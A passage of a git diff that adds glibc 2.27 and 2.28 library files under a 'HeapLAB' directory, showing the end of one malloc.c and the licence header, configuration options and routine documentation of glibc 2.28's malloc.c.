+	if (sizes[i].count != 0 && i != NFASTBINS)
+	  fprintf (fp, "							      \
+  <size from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		   sizes[i].from, sizes[i].to, sizes[i].total, sizes[i].count);
+
+      if (sizes[NFASTBINS].count != 0)
+	fprintf (fp, "\
+  <unsorted from=\"%zu\" to=\"%zu\" total=\"%zu\" count=\"%zu\"/>\n",
+		 sizes[NFASTBINS].from, sizes[NFASTBINS].to,
+		 sizes[NFASTBINS].total, sizes[NFASTBINS].count);
+
+      total_system += ar_ptr->system_mem;
+      total_max_system += ar_ptr->max_system_mem;
+
+      fprintf (fp,
+	       "</sizes>\n<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	       "<system type=\"current\" size=\"%zu\"/>\n"
+	       "<system type=\"max\" size=\"%zu\"/>\n",
+	       nfastblocks, fastavail, nblocks, avail,
+	       ar_ptr->system_mem, ar_ptr->max_system_mem);
+
+      if (ar_ptr != &main_arena)
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+		   "<aspace type=\"subheaps\" size=\"%zu\"/>\n",
+		   heap_size, heap_mprotect_size, heap_count);
+	  total_aspace += heap_size;
+	  total_aspace_mprotect += heap_mprotect_size;
+	}
+      else
+	{
+	  fprintf (fp,
+		   "<aspace type=\"total\" size=\"%zu\"/>\n"
+		   "<aspace type=\"mprotect\" size=\"%zu\"/>\n",
+		   ar_ptr->system_mem, ar_ptr->system_mem);
+	  total_aspace += ar_ptr->system_mem;
+	  total_aspace_mprotect += ar_ptr->system_mem;
+	}
+
+      fputs ("</heap>\n", fp);
+      ar_ptr = ar_ptr->next;
+    }
+  while (ar_ptr != &main_arena);
+
+  fprintf (fp,
+	   "<total type=\"fast\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"rest\" count=\"%zu\" size=\"%zu\"/>\n"
+	   "<total type=\"mmap\" count=\"%d\" size=\"%zu\"/>\n"
+	   "<system type=\"current\" size=\"%zu\"/>\n"
+	   "<system type=\"max\" size=\"%zu\"/>\n"
+	   "<aspace type=\"total\" size=\"%zu\"/>\n"
+	   "<aspace type=\"mprotect\" size=\"%zu\"/>\n"
+	   "</malloc>\n",
+	   total_nfastblocks, total_fastavail, total_nblocks, total_avail,
+	   mp_.n_mmaps, mp_.mmapped_mem,
+	   total_system, total_max_system,
+	   total_aspace, total_aspace_mprotect);
+
+  return 0;
+}
+weak_alias (__malloc_info, malloc_info)
+
+
+strong_alias (__libc_calloc, __calloc) weak_alias (__libc_calloc, calloc)
+strong_alias (__libc_free, __free) strong_alias (__libc_free, free)
+strong_alias (__libc_malloc, __malloc) strong_alias (__libc_malloc, malloc)
+strong_alias (__libc_memalign, __memalign)
+weak_alias (__libc_memalign, memalign)
+strong_alias (__libc_realloc, __realloc) strong_alias (__libc_realloc, realloc)
+strong_alias (__libc_valloc, __valloc) weak_alias (__libc_valloc, valloc)
+strong_alias (__libc_pvalloc, __pvalloc) weak_alias (__libc_pvalloc, pvalloc)
+strong_alias (__libc_mallinfo, __mallinfo)
+weak_alias (__libc_mallinfo, mallinfo)
+strong_alias (__libc_mallopt, __mallopt) weak_alias (__libc_mallopt, mallopt)
+
+weak_alias (__malloc_stats, malloc_stats)
+weak_alias (__malloc_usable_size, malloc_usable_size)
+weak_alias (__malloc_trim, malloc_trim)
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_26)
+compat_symbol (libc, __libc_free, cfree, GLIBC_2_0);
+#endif
+
+/* ------------------------------------------------------------
+   History:
+
+   [see ftp://g.oswego.edu/pub/misc/malloc.c for the history of dlmalloc]
+
+ */
+/*
+ * Local variables:
+ * c-basic-offset: 2
+ * End:
+ */
diff --git a/HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/ld-2.27.so b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/ld-2.27.so
new file mode 100755
index 0000000..a623755
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/ld-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/libc-2.27.so b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/libc-2.27.so
new file mode 100755
index 0000000..5b2d759
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/.debug/libc-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld-2.27.so b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld-2.27.so
new file mode 100755
index 0000000..a8cb029
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld.so.2 b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld.so.2
new file mode 120000
index 0000000..2ffc93b
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/ld.so.2
@@ -0,0 +1 @@
+ld-2.27.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc-2.27.so b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc-2.27.so
new file mode 100755
index 0000000..f5b26e3
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc-2.27.so differ
diff --git a/HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc.so.6 b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc.so.6
new file mode 120000
index 0000000..aa8ad7a
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.27_ubuntu1804/libc.so.6
@@ -0,0 +1 @@
+libc-2.27.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.28/ld-2.28.so b/HeapLAB/.glibc/glibc_2.28/ld-2.28.so
new file mode 100755
index 0000000..f8f0382
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.28/ld-2.28.so differ
diff --git a/HeapLAB/.glibc/glibc_2.28/ld.so.2 b/HeapLAB/.glibc/glibc_2.28/ld.so.2
new file mode 120000
index 0000000..695c5dc
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.28/ld.so.2
@@ -0,0 +1 @@
+ld-2.28.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.28/libc-2.28.so b/HeapLAB/.glibc/glibc_2.28/libc-2.28.so
new file mode 100755
index 0000000..22c09b1
Binary files /dev/null and b/HeapLAB/.glibc/glibc_2.28/libc-2.28.so differ
diff --git a/HeapLAB/.glibc/glibc_2.28/libc.so.6 b/HeapLAB/.glibc/glibc_2.28/libc.so.6
new file mode 120000
index 0000000..695ffa0
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.28/libc.so.6
@@ -0,0 +1 @@
+libc-2.28.so
\ No newline at end of file
diff --git a/HeapLAB/.glibc/glibc_2.28/malloc/malloc.c b/HeapLAB/.glibc/glibc_2.28/malloc/malloc.c
new file mode 100644
index 0000000..e247c77
--- /dev/null
+++ b/HeapLAB/.glibc/glibc_2.28/malloc/malloc.c
@@ -0,0 +1,5593 @@
+/* Malloc implementation for multiple threads without lock contention.
+   Copyright (C) 1996-2018 Free Software Foundation, Inc.
+   This file is part of the GNU C Library.
+   Contributed by Wolfram Gloger <wg@malloc.de>
+   and Doug Lea <dl@cs.oswego.edu>, 2001.
+
+   The GNU C Library is free software; you can redistribute it and/or
+   modify it under the terms of the GNU Lesser General Public License as
+   published by the Free Software Foundation; either version 2.1 of the
+   License, or (at your option) any later version.
+
+   The GNU C Library is distributed in the hope that it will be useful,
+   but WITHOUT ANY WARRANTY; without even the implied warranty of
+   MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
+   Lesser General Public License for more details.
+
+   You should have received a copy of the GNU Lesser General Public
+   License along with the GNU C Library; see the file COPYING.LIB.  If
+   not, see <http://www.gnu.org/licenses/>.  */
+
+/*
+  This is a version (aka ptmalloc2) of malloc/free/realloc written by
+  Doug Lea and adapted to multiple threads/arenas by Wolfram Gloger.
+
+  There have been substantial changes made after the integration into
+  glibc in all parts of the code.  Do not look for much commonality
+  with the ptmalloc2 version.
+
+* Version ptmalloc2-20011215
+  based on:
+  VERSION 2.7.0 Sun Mar 11 14:14:06 2001  Doug Lea  (dl at gee)
+
+* Quickstart
+
+  In order to compile this implementation, a Makefile is provided with
+  the ptmalloc2 distribution, which has pre-defined targets for some
+  popular systems (e.g. "make posix" for Posix threads).  All that is
+  typically required with regard to compiler flags is the selection of
+  the thread package via defining one out of USE_PTHREADS, USE_THR or
+  USE_SPROC.  Check the thread-m.h file for what effects this has.
+  Many/most systems will additionally require USE_TSD_DATA_HACK to be
+  defined, so this is the default for "make posix".
+
+* Why use this malloc?
+
+  This is not the fastest, most space-conserving, most portable, or
+  most tunable malloc ever written. However it is among the fastest
+  while also being among the most space-conserving, portable and tunable.
+  Consistent balance across these factors results in a good general-purpose
+  allocator for malloc-intensive programs.
+
+  The main properties of the algorithms are:
+  * For large (>= 512 bytes) requests, it is a pure best-fit allocator,
+    with ties normally decided via FIFO (i.e. least recently used).
+  * For small (<= 64 bytes by default) requests, it is a caching
+    allocator, that maintains pools of quickly recycled chunks.
+  * In between, and for combinations of large and small requests, it does
+    the best it can trying to meet both goals at once.
+  * For very large requests (>= 128KB by default), it relies on system
+    memory mapping facilities, if supported.
+
+  For a longer but slightly out of date high-level description, see
+     http://gee.cs.oswego.edu/dl/html/malloc.html
+
+  You may already by default be using a C library containing a malloc
+  that is  based on some version of this malloc (for example in
+  linux). You might still want to use the one in this file in order to
+  customize settings or to avoid overheads associated with library
+  versions.
+
+* Contents, described in more detail in "description of public routines" below.
+
+  Standard (ANSI/SVID/...)  functions:
+    malloc(size_t n);
+    calloc(size_t n_elements, size_t element_size);
+    free(void* p);
+    realloc(void* p, size_t n);
+    memalign(size_t alignment, size_t n);
+    valloc(size_t n);
+    mallinfo()
+    mallopt(int parameter_number, int parameter_value)
+
+  Additional functions:
+    independent_calloc(size_t n_elements, size_t size, void* chunks[]);
+    independent_comalloc(size_t n_elements, size_t sizes[], void* chunks[]);
+    pvalloc(size_t n);
+    malloc_trim(size_t pad);
+    malloc_usable_size(void* p);
+    malloc_stats();
+
+* Vital statistics:
+
+  Supported pointer representation:       4 or 8 bytes
+  Supported size_t  representation:       4 or 8 bytes
+       Note that size_t is allowed to be 4 bytes even if pointers are 8.
+       You can adjust this by defining INTERNAL_SIZE_T
+
+  Alignment:                              2 * sizeof(size_t) (default)
+       (i.e., 8 byte alignment with 4byte size_t). This suffices for
+       nearly all current machines and C compilers. However, you can
+       define MALLOC_ALIGNMENT to be wider than this if necessary.
+
+  Minimum overhead per allocated chunk:   4 or 8 bytes
+       Each malloced chunk has a hidden word of overhead holding size
+       and status information.
+
+  Minimum allocated size: 4-byte ptrs:  16 bytes    (including 4 overhead)
+			  8-byte ptrs:  24/32 bytes (including, 4/8 overhead)
+
+       When a chunk is freed, 12 (for 4byte ptrs) or 20 (for 8 byte
+       ptrs but 4 byte size) or 24 (for 8/8) additional bytes are
+       needed; 4 (8) for a trailing size field and 8 (16) bytes for
+       free list pointers. Thus, the minimum allocatable size is
+       16/24/32 bytes.
+
+       Even a request for zero bytes (i.e., malloc(0)) returns a
+       pointer to something of the minimum allocatable size.
+
+       The maximum overhead wastage (i.e., number of extra bytes
+       allocated than were requested in malloc) is less than or equal
+       to the minimum size, except for requests >= mmap_threshold that
+       are serviced via mmap(), where the worst case wastage is 2 *
+       sizeof(size_t) bytes plus the remainder from a system page (the
+       minimal mmap unit); typically 4096 or 8192 bytes.
+
+  Maximum allocated size:  4-byte size_t: 2^32 minus about two pages
+			   8-byte size_t: 2^64 minus about two pages
+
+       It is assumed that (possibly signed) size_t values suffice to
+       represent chunk sizes. `Possibly signed' is due to the fact
+       that `size_t' may be defined on a system as either a signed or
+       an unsigned type. The ISO C standard says that it must be
+       unsigned, but a few systems are known not to adhere to this.
+       Additionally, even when size_t is unsigned, sbrk (which is by
+       default used to obtain memory from system) accepts signed
+       arguments, and may not be able to handle size_t-wide arguments
+       with negative sign bit.  Generally, values that would
+       appear as negative after accounting for overhead and alignment
+       are supported only via mmap(), which does not have this
+       limitation.
+
+       Requests for sizes outside the allowed range will perform an optional
+       failure action and then return null. (Requests may also
+       also fail because a system is out of memory.)
+
+  Thread-safety: thread-safe
+
+  Compliance: I believe it is compliant with the 1997 Single Unix Specification
+       Also SVID/XPG, ANSI C, and probably others as well.
+
+* Synopsis of compile-time options:
+
+    People have reported using previous versions of this malloc on all
+    versions of Unix, sometimes by tweaking some of the defines
+    below. It has been tested most extensively on Solaris and Linux.
+    People also report using it in stand-alone embedded systems.
+
+    The implementation is in straight, hand-tuned ANSI C.  It is not
+    at all modular. (Sorry!)  It uses a lot of macros.  To be at all
+    usable, this code should be compiled using an optimizing compiler
+    (for example gcc -O3) that can simplify expressions and control
+    paths. (FAQ: some macros import variables as arguments rather than
+    declare locals because people reported that some debuggers
+    otherwise get confused.)
+
+    OPTION                     DEFAULT VALUE
+
+    Compilation Environment options:
+
+    HAVE_MREMAP                0
+
+    Changing default word sizes:
+
+    INTERNAL_SIZE_T            size_t
+
+    Configuration and functionality options:
+
+    USE_PUBLIC_MALLOC_WRAPPERS NOT defined
+    USE_MALLOC_LOCK            NOT defined
+    MALLOC_DEBUG               NOT defined
+    REALLOC_ZERO_BYTES_FREES   1
+    TRIM_FASTBINS              0
+
+    Options for customizing MORECORE:
+
+    MORECORE                   sbrk
+    MORECORE_FAILURE           -1
+    MORECORE_CONTIGUOUS        1
+    MORECORE_CANNOT_TRIM       NOT defined
+    MORECORE_CLEARS            1
+    MMAP_AS_MORECORE_SIZE      (1024 * 1024)
+
+    Tuning options that are also dynamically changeable via mallopt:
+
+    DEFAULT_MXFAST             64 (for 32bit), 128 (for 64bit)
+    DEFAULT_TRIM_THRESHOLD     128 * 1024
+    DEFAULT_TOP_PAD            0
+    DEFAULT_MMAP_THRESHOLD     128 * 1024
+    DEFAULT_MMAP_MAX           65536
+
+    There are several other #defined constants and macros that you
+    probably don't want to touch unless you are extending or adapting malloc.  */
+
+/*
+  void* is the pointer type that malloc should say it returns
+*/
+
+#ifndef void
+#define void      void
+#endif /*void*/
+
+#include <stddef.h>   /* for size_t */
+#include <stdlib.h>   /* for getenv(), abort() */
+#include <unistd.h>   /* for __libc_enable_secure */
+
+#include <atomic.h>
+#include <_itoa.h>
+#include <bits/wordsize.h>
+#include <sys/sysinfo.h>
+
+#include <ldsodefs.h>
+
+#include <unistd.h>
+#include <stdio.h>    /* needed for malloc_stats */
+#include <errno.h>
+#include <assert.h>
+
+#include <shlib-compat.h>
+
+/* For uintptr_t.  */
+#include <stdint.h>
+
+/* For va_arg, va_start, va_end.  */
+#include <stdarg.h>
+
+/* For MIN, MAX, powerof2.  */
+#include <sys/param.h>
+
+/* For ALIGN_UP et. al.  */
+#include <libc-pointer-arith.h>
+
+/* For DIAG_PUSH/POP_NEEDS_COMMENT et al.  */
+#include <libc-diag.h>
+
+#include <malloc/malloc-internal.h>
+
+/* For SINGLE_THREAD_P.  */
+#include <sysdep-cancel.h>
+
+/*
+  Debugging:
+
+  Because freed chunks may be overwritten with bookkeeping fields, this
+  malloc will often die when freed memory is overwritten by user
+  programs.  This can be very effective (albeit in an annoying way)
+  in helping track down dangling pointers.
+
+  If you compile with -DMALLOC_DEBUG, a number of assertion checks are
+  enabled that will catch more memory errors. You probably won't be
+  able to make much sense of the actual assertion errors, but they
+  should help you locate incorrectly overwritten memory.  The checking
+  is fairly extensive, and will slow down execution
+  noticeably. Calling malloc_stats or mallinfo with MALLOC_DEBUG set
+  will attempt to check every non-mmapped allocated and free chunk in
+  the course of computing the summmaries. (By nature, mmapped regions
+  cannot be checked very much automatically.)
+
+  Setting MALLOC_DEBUG may also be helpful if you are trying to modify
+  this code. The assertions in the check routines spell out in more
+  detail the assumptions and invariants underlying the algorithms.
+
+  Setting MALLOC_DEBUG does NOT provide an automated mechanism for
+  checking that all accesses to malloced memory stay within their
+  bounds. However, there are several add-ons and adaptations of this
+  or other mallocs available that do this.
+*/
+
+#ifndef MALLOC_DEBUG
+#define MALLOC_DEBUG 0
+#endif
+
+#ifndef NDEBUG
+# define __assert_fail(assertion, file, line, function)			\
+	 __malloc_assert(assertion, file, line, function)
+
+extern const char *__progname;
+
+static void
+__malloc_assert (const char *assertion, const char *file, unsigned int line,
+		 const char *function)
+{
+  (void) __fxprintf (NULL, "%s%s%s:%u: %s%sAssertion `%s' failed.\n",
+		     __progname, __progname[0] ? ": " : "",
+		     file, line,
+		     function ? function : "", function ? ": " : "",
+		     assertion);
+  fflush (stderr);
+  abort ();
+}
+#endif
+
+#if USE_TCACHE
+/* We want 64 entries.  This is an arbitrary limit, which tunables can reduce.  */
+# define TCACHE_MAX_BINS		64
+# define MAX_TCACHE_SIZE	tidx2usize (TCACHE_MAX_BINS-1)
+
+/* Only used to pre-fill the tunables.  */
+# define tidx2usize(idx)	(((size_t) idx) * MALLOC_ALIGNMENT + MINSIZE - SIZE_SZ)
+
+/* When "x" is from chunksize().  */
+# define csize2tidx(x) (((x) - MINSIZE + MALLOC_ALIGNMENT - 1) / MALLOC_ALIGNMENT)
+/* When "x" is a user-provided size.  */
+# define usize2tidx(x) csize2tidx (request2size (x))
+
+/* With rounding and alignment, the bins are...
+   idx 0   bytes 0..24 (64-bit) or 0..12 (32-bit)
+   idx 1   bytes 25..40 or 13..20
+   idx 2   bytes 41..56 or 21..28
+   etc.  */
+
+/* This is another arbitrary limit, which tunables can change.  Each
+   tcache bin will hold at most this number of chunks.  */
+# define TCACHE_FILL_COUNT 7
+#endif
+
+
+/*
+  REALLOC_ZERO_BYTES_FREES should be set if a call to
+  realloc with zero bytes should be the same as a call to free.
+  This is required by the C standard. Otherwise, since this malloc
+  returns a unique pointer for malloc(0), so does realloc(p, 0).
+*/
+
+#ifndef REALLOC_ZERO_BYTES_FREES
+#define REALLOC_ZERO_BYTES_FREES 1
+#endif
+
+/*
+  TRIM_FASTBINS controls whether free() of a very small chunk can
+  immediately lead to trimming. Setting to true (1) can reduce memory
+  footprint, but will almost always slow down programs that use a lot
+  of small chunks.
+
+  Define this only if you are willing to give up some speed to more
+  aggressively reduce system-level memory footprint when releasing
+  memory in programs that use many small chunks.  You can get
+  essentially the same effect by setting MXFAST to 0, but this can
+  lead to even greater slowdowns in programs using many small chunks.
+  TRIM_FASTBINS is an in-between compile-time option, that disables
+  only those chunks bordering topmost memory from being placed in
+  fastbins.
+*/
+
+#ifndef TRIM_FASTBINS
+#define TRIM_FASTBINS  0
+#endif
+
+
+/* Definition for getting more memory from the OS.  */
+#define MORECORE         (*__morecore)
+#define MORECORE_FAILURE 0
+void * __default_morecore (ptrdiff_t);
+void *(*__morecore)(ptrdiff_t) = __default_morecore;
+
+
+#include <string.h>
+
+/*
+  MORECORE-related declarations. By default, rely on sbrk
+*/
+
+
+/*
+  MORECORE is the name of the routine to call to obtain more memory
+  from the system.  See below for general guidance on writing
+  alternative MORECORE functions, as well as a version for WIN32 and a
+  sample version for pre-OSX macos.
+*/
+
+#ifndef MORECORE
+#define MORECORE sbrk
+#endif
+
+/*
+  MORECORE_FAILURE is the value returned upon failure of MORECORE
+  as well as mmap. Since it cannot be an otherwise valid memory address,
+  and must reflect values of standard sys calls, you probably ought not
+  try to redefine it.
+*/
+
+#ifndef MORECORE_FAILURE
+#define MORECORE_FAILURE (-1)
+#endif
+
+/*
+  If MORECORE_CONTIGUOUS is true, take advantage of fact that
+  consecutive calls to MORECORE with positive arguments always return
+  contiguous increasing addresses.  This is true of unix sbrk.  Even
+  if not defined, when regions happen to be contiguous, malloc will
+  permit allocations spanning regions obtained from different
+  calls. But defining this when applicable enables some stronger
+  consistency checks and space efficiencies.
+*/
+
+#ifndef MORECORE_CONTIGUOUS
+#define MORECORE_CONTIGUOUS 1
+#endif
+
+/*
+  Define MORECORE_CANNOT_TRIM if your version of MORECORE
+  cannot release space back to the system when given negative
+  arguments. This is generally necessary only if you are using
+  a hand-crafted MORECORE function that cannot handle negative arguments.
+*/
+
+/* #define MORECORE_CANNOT_TRIM */
+
+/*  MORECORE_CLEARS           (default 1)
+     The degree to which the routine mapped to MORECORE zeroes out
+     memory: never (0), only for newly allocated space (1) or always
+     (2).  The distinction between (1) and (2) is necessary because on
+     some systems, if the application first decrements and then
+     increments the break value, the contents of the reallocated space
+     are unspecified.
+ */
+
+#ifndef MORECORE_CLEARS
+# define MORECORE_CLEARS 1
+#endif
+
+
+/*
+   MMAP_AS_MORECORE_SIZE is the minimum mmap size argument to use if
+   sbrk fails, and mmap is used as a backup.  The value must be a
+   multiple of page size.  This backup strategy generally applies only
+   when systems have "holes" in address space, so sbrk cannot perform
+   contiguous expansion, but there is still space available on system.
+   On systems for which this is known to be useful (i.e. most linux
+   kernels), this occurs only when programs allocate huge amounts of
+   memory.  Between this, and the fact that mmap regions tend to be
+   limited, the size should be large, to avoid too many mmap calls and
+   thus avoid running out of kernel resources.  */
+
+#ifndef MMAP_AS_MORECORE_SIZE
+#define MMAP_AS_MORECORE_SIZE (1024 * 1024)
+#endif
+
+/*
+  Define HAVE_MREMAP to make realloc() use mremap() to re-allocate
+  large blocks.
+*/
+
+#ifndef HAVE_MREMAP
+#define HAVE_MREMAP 0
+#endif
+
+/* We may need to support __malloc_initialize_hook for backwards
+   compatibility.  */
+
+#if SHLIB_COMPAT (libc, GLIBC_2_0, GLIBC_2_24)
+# define HAVE_MALLOC_INIT_HOOK 1
+#else
+# define HAVE_MALLOC_INIT_HOOK 0
+#endif
+
+
+/*
+  This version of malloc supports the standard SVID/XPG mallinfo
+  routine that returns a struct containing usage properties and
+  statistics. It should work on any SVID/XPG compliant system that has
+  a /usr/include/malloc.h defining struct mallinfo. (If you'd like to
+  install such a thing yourself, cut out the preliminary declarations
+  as described above and below and save them in a malloc.h file. But
+  there's no compelling reason to bother to do this.)
+
+  The main declaration needed is the mallinfo struct that is returned
+  (by-copy) by mallinfo().  The SVID/XPG malloinfo struct contains a
+  bunch of fields that are not even meaningful in this version of
+  malloc.  These fields are are instead filled by mallinfo() with
+  other numbers that might be of interest.
+*/
+
+
+/* ---------- description of public routines ------------ */
+
+/*
+  malloc(size_t n)
+  Returns a pointer to a newly allocated chunk of at least n bytes, or null
+  if no space is available. Additionally, on failure, errno is
+  set to ENOMEM on ANSI C systems.
+
+  If n is zero, malloc returns a minumum-sized chunk. (The minimum
+  size is 16 bytes on most 32bit systems, and 24 or 32 bytes on 64bit
+  systems.)  On most systems, size_t is an unsigned type, so calls
+  with negative arguments are interpreted as requests for huge amounts
+  of space, which will often fail. The maximum supported value of n
+  differs across systems, but is in all cases less than the maximum
+  representable value of a size_t.
+*/
+void*  __libc_malloc(size_t);
+libc_hidden_proto (__libc_malloc)
+
+/*
+  free(void* p)
+  Releases the chunk of memory pointed to by p, that had been previously
+  allocated using malloc or a related routine such as realloc.
+  It has no effect if p is null. It can have arbitrary (i.e., bad!)
+  effects if p has already been freed.
+
+  Unless disabled (using mallopt), freeing very large spaces will
+  when possible, automatically trigger operations that give
+  back unused memory to the system, thus reducing program footprint.
+*/
+void     __libc_free(void*);
+libc_hidden_proto (__libc_free)
+
+/*
+  calloc(size_t n_elements, size_t element_size);
+  Returns a pointer to n_elements * element_size bytes, with all locations
+  set to zero.
+*/
+void*  __libc_calloc(size_t, size_t);
+
+/*
+  realloc(void* p, size_t n)
+  Returns a pointer to a chunk of size n that contains the same data
+  as does chunk p up to the minimum of (n, p's size) bytes, or null
+  if no space is available.
+
+  The returned pointer may or may not be the same as p. The algorithm
+  prefers extending p when possible, otherwise it employs the
+  equivalent of a malloc-copy-free sequence.
+
+  If p is null, realloc is equivalent to malloc.
+
+  If space is not available, realloc returns null, errno is set (if on
+  ANSI) and p is NOT freed.
+
+  if n is for fewer bytes than already held by p, the newly unused
+  space is lopped off and freed if possible.  Unless the #define
+  REALLOC_ZERO_BYTES_FREES is set, realloc with a size argument of
+  zero (re)allocates a minimum-sized chunk.
+
+  Large chunks that were internally obtained via mmap will always be
+  grown using malloc-copy-free sequences unless the system supports
+  MREMAP (currently only linux).
+
+  The old unix realloc convention of allowing the last-free'd chunk
+  to be used as an argument to realloc is not supported.
+*/
+void*  __libc_realloc(void*, size_t);
+libc_hidden_proto (__libc_realloc)
+
+/*
+  memalign(size_t alignment, size_t n);
+  Returns a pointer to a newly allocated chunk of n bytes, aligned
+  in accord with the alignment argument.
+
+  The alignment argument should be a power of two. If the argument is
+  not a power of two, the nearest greater power is used.
+  8-byte alignment is guaranteed by normal malloc calls, so don't
+  bother calling memalign with an argument of 8 or less.
+
+  Overreliance on memalign is a sure way to fragment space.
+*/
+void*  __libc_memalign(size_t, size_t);
+libc_hidden_proto (__libc_memalign)
+
+/*
+  valloc(size_t n);
+  Equivalent to memalign(pagesize, n), where pagesize is the page
+  size of the system. If the pagesize is unknown, 4096 is used.
+*/
+void*  __libc_valloc(size_t);
+
+
+
+/*
+  mallopt(int parameter_number, int parameter_value)
+  Sets tunable parameters The format is to provide a
+  (parameter-number, parameter-value) pair.  mallopt then sets the
+  corresponding parameter to the argument value if it can (i.e., so
+  long as the value is meaningful), and returns 1 if successful else
+  0.  SVID/XPG/ANSI defines four standard param numbers for mallopt,
+  normally defined in malloc.h.  Only one of these (M_MXFAST) is used
+  in this malloc. The others (M_NLBLKS, M_GRAIN, M_KEEP) don't apply,
+  so setting them has no effect. But this malloc also supports four
+  other options in mallopt. See below for details.  Briefly, supported
+  parameters are as follows (listed defaults are for "typical"
+  configurations).
+
+  Symbol            param #   default    allowed param values
+  M_MXFAST          1         64         0-80  (0 disables fastbins)
+  M_TRIM_THRESHOLD -1         128*1024   any   (-1U disables trimming)
+  M_TOP_PAD        -2         0          any
+  M_MMAP_THRESHOLD -3         128*1024   any   (or 0 if no MMAP support)
+  M_MMAP_MAX       -4         65536      any   (0 disables use of mmap)
+*/
+int      __libc_mallopt(int, int);
+libc_hidden_proto (__libc_mallopt)
+
+
+/*
+  mallinfo()
+  Returns (by copy) a struct containing various summary statistics:
+
+  arena:     current total non-mmapped bytes allocated from system
+  ordblks:   the number of free chunks
+  smblks:    the number of fastbin blocks (i.e., small chunks that
+	       have been freed but not use resused or consolidated)
+  hblks:     current number of mmapped regions
+  hblkhd:    total bytes held in mmapped regions
+  usmblks:   always 0
+  fsmblks:   total bytes held in fastbin blocks
+  uordblks:  current total allocated space (normal or mmapped)
+  fordblks:  total free space
+  keepcost:  the maximum number of bytes that could ideally be released
+	       back to system via malloc_trim. ("ideally" means that
+	       it ignores page restrictions etc.)
+
+  Because these fields are ints, but internal bookkeeping may
+  be kept as longs, the reported values may wrap around zero and
+  thus be inaccurate.
+*/
+struct mallinfo __libc_mallinfo(void);
+
+
+/*
+  pvalloc(size_t n);
+  Equivalent to valloc(minimum-page-that-holds(n)), that is,
+  round up n to nearest pagesize.
+ */
+void*  __libc_pvalloc(size_t);
+
+/*
+  malloc_trim(size_t pad);
+
+  If possible, gives memory back to the system (via negative
+  arguments to sbrk) if there is unused memory at the `high' end of
+  the malloc pool. You can call this after freeing large blocks of
+  memory to potentially reduce the system-level memory requirements
+  of a program. However, it cannot guarantee to reduce memory. Under
+  some allocation patterns, some large free blocks of memory will be
+  locked between two used chunks, so they cannot be given back to
+  the system.
+
+  The `pad' argument to malloc_trim represents the amount of free
+  trailing space to leave untrimmed. If this argument is zero,
+  only the minimum amount of memory to maintain internal data
+  structures will be left (one page or less). Non-zero arguments
+  can be supplied to maintain enough trailing space to service
+  future expected allocations without having to re-obtain memory
+  from the system.
+
+  Malloc_trim returns 1 if it actually released any memory, else 0.
+  On systems that do not support "negative sbrks", it will always
+  return 0.
+*/
+int      __malloc_trim(size_t);
+
+/*
+  malloc_usable_size(void* p);
+
+  Returns the number of bytes you can actually use in
+  an allocated chunk, which may be more than you requested (although
+  often not) due to alignment and minimum size constraints.
+  You can use this many bytes without worrying about
+  overwriting other allocated objects. This is not a particularly great
+  programming practice. malloc_usable_size can be more useful in
+  debugging and assertions, for example:
+
+  p = malloc(n);
+  assert(malloc_usable_size(p) >= 256);
+
+*/
+size_t   __malloc_usable_size(void*);
+
+/*
+  malloc_stats();
+  Prints on stderr the amount of space obtained from the system (both
+  via sbrk and mmap), the maximum amount (which may be more than
+  current if malloc_trim and/or munmap got called), and the current
+  number of bytes allocated via malloc (or realloc, etc) but not yet
+  freed. Note that this is the number of bytes allocated, not the
+  number requested. It will be larger than the number requested
+  because of alignment and bookkeeping overhead. Because it includes
+  alignment wastage as being in use, this figure may be greater than
+  zero even when no user-level chunks are allocated.
+
+  The reported current and maximum system memory can be inaccurate if
+  a program makes other calls to system memory allocation functions
+  (normally sbrk) outside of malloc.
+
+  malloc_stats prints only the most commonly interesting statistics.
+  More information can be obtained by calling mallinfo.
+
+*/
+void     __malloc_stats(void);
+
+/*
+  posix_memalign(void **memptr, size_t alignment, size_t size);
+
+  POSIX wrapper like memalign(), checking for validity of size.
+*/
+int      __posix_memalign(void **, size_t, size_t);
+
+/* mallopt tuning options */
+
+/*
+  M_MXFAST is the maximum request size used for "fastbins", special bins
+  that hold returned chunks without consolidating their spaces. This
+  enables future requests for chunks of the same size to be handled
+  very quickly, but can increase fragmentation, and thus increase the
+  overall memory footprint of a program.
+
+  This malloc manages fastbins very conservatively yet still
+  efficiently, so fragmentation is rarely a problem for values less
+  than or equal to the default.  The maximum supported value of MXFAST
+  is 80. You wouldn't want it any higher than this anyway.  Fastbins
